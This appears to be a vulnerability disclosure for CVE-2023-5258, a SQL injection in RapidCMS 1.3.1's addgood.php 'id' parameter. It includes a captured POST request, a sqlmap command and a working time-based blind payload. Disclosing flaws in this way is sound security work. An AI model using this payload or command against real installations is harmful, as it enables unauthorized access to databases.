Headline
CVE-2023-5258: SQL injection vulnerability exists in RapidCMS Dev.1.3.1 · Issue #4 · yhy217/rapidcms-vul
A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /resource/addgood.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240867.
[Suggested description]
RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in /resource/addgood.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/OpenRapid/rapidcms
[Affected Product Code Base]
RapidCMS Dev.1.3.1
[Affected Component]
File: /resource/addgood.php
Parameter: id
[Attack Type]
Remote
[Vulnerability demonstration]
1.using hackbar,use post method to access http://localhost:8095/resource/addgood.php,postdata:id=1*,click execute buuton
- use BurpSuit to capture packets and copy request packet in 175.txt In the directory of sqlmap.
the data in 175.txt:
POST /resource/addgood.php HTTP/1.1
Host: localhost:8096
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: http://localhost:8096
Connection: close
Referer: http://localhost:8096/resource/addgood.php
Cookie: PHPSESSID=su3eg6251ks1n2i43n36fqbn46; admin=Y6W6Rbt6a5W546O0O0O7; user=e4W4h250M9DaA6xa; name=yhy001
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
id=1*****3.run the command python sqlmap.py -r 175.txt --risk=3 --level=5 --current-db
After the probe is completed, SQL injection vulnerability is found in the id parameter,and the current database name is obtained
sqlmap resumed the following injection point(s) from stored session:****Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 1415 FROM (SELECT(SLEEP(5)))IZIr)-- VZWO
[Cause of vulnerability]
In /resource/addgood.php , the user can control the value of id and the system does not validate the
validity of the user’s input. The attacker can use double quotation marks to splice SQL statements, thus
causing SQL injection
[Repair suggestions]
Verify the legitimacy of user input.